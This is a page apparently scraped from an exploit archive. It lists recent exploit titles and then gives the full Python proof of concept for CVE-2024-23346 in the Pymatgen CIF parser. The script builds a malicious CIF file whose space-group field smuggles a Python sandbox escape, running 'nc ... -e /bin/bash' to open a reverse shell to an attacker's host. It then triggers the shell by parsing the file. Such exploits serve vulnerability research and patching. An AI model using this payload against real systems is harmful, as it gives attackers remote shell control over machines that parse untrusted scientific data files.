
22 changes to exploits/shellcodes/ghdb Spring Boot common-user-management 0.1 - Remote Code Execution (RCE) ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) - Stored Cross-Site Scripting ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure ABB Cylon Aspect 3.08.03 (CookieDB) - SQL Injection Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE) ABB Cylon Aspect 3.08.03 (MapServicesHandler) - Authenticated Reflected XSS ABB Cylon Aspect 3.08.03 - Hard-coded Secrets Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE) IBMi Navigator 7.5 - HTTP Security Token Bypass IBMi Navigator 7.5 - Server Side Request Forgery (SSRF) Plane 0.23.1 - Server side request forgery (SSRF) ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS) ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning Cacti 1.2.26 - Remote Code Execution (RCE) (Authenticated) OpenCMS 17.0 - Stored Cross Site Scripting (XSS) Really Simple Security 9.1.1.1 - Authentication Bypass Pymatgen 2024.1 - Remote Code Execution (RCE)
53 lines
No EOL
1.8 KiB
Python
Executable file
53 lines
No EOL
1.8 KiB
Python
Executable file
# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
|
|
# Google Dork : (not applicable)
|
|
# Date : 2024-11-13
|
|
# Exploit Author : Mohammed Idrees Banyamer
|
|
# Vendor Homepage : https ://pymatgen.org
|
|
# Software Link : https ://pypi.org /project /pymatgen/
|
|
# Version : 2024.1
|
|
# Tested on : Kali Linux 2024.1
|
|
# CVE : CVE-2024-23346
|
|
|
|
|
|
import os
|
|
|
|
# Function to create the malicious CIF file
|
|
def create_malicious_cif(ip, port):
|
|
# Constructing the malicious CIF file with reverse shell payload
|
|
malicious_cif = f"""
|
|
data_5yOhtAoR
|
|
_audit_creation_date 2024-11-13
|
|
_audit_creation_method "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"
|
|
|
|
loop_
|
|
_parent_propagation_vector.id
|
|
_parent_propagation_vector.kxkykz
|
|
k1 [0 0 0]
|
|
|
|
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'
|
|
|
|
_space_group_magn.number_BNS 62.448
|
|
_space_group_magn.name_BNS "P n' m a' "
|
|
"""
|
|
|
|
# Save to a file
|
|
with open("vuln.cif", "w") as file:
|
|
file.write(malicious_cif)
|
|
print("[*] Malicious CIF file created: vuln.cif")
|
|
|
|
# Function to trigger the exploit by parsing the malicious CIF file
|
|
def exploit():
|
|
ip = input("Enter your IP address for the reverse shell: ")
|
|
port = input("Enter the port for the reverse shell to listen on: ")
|
|
|
|
# Create the malicious CIF file
|
|
create_malicious_cif(ip, port)
|
|
|
|
# Trigger the Pymatgen CIF parser to parse the malicious file
|
|
from pymatgen.io.cif import CifParser
|
|
parser = CifParser("vuln.cif")
|
|
structure = parser.parse_structures()
|
|
|
|
# Running the exploit
|
|
if __name__ == "__main__":
|
|
exploit() |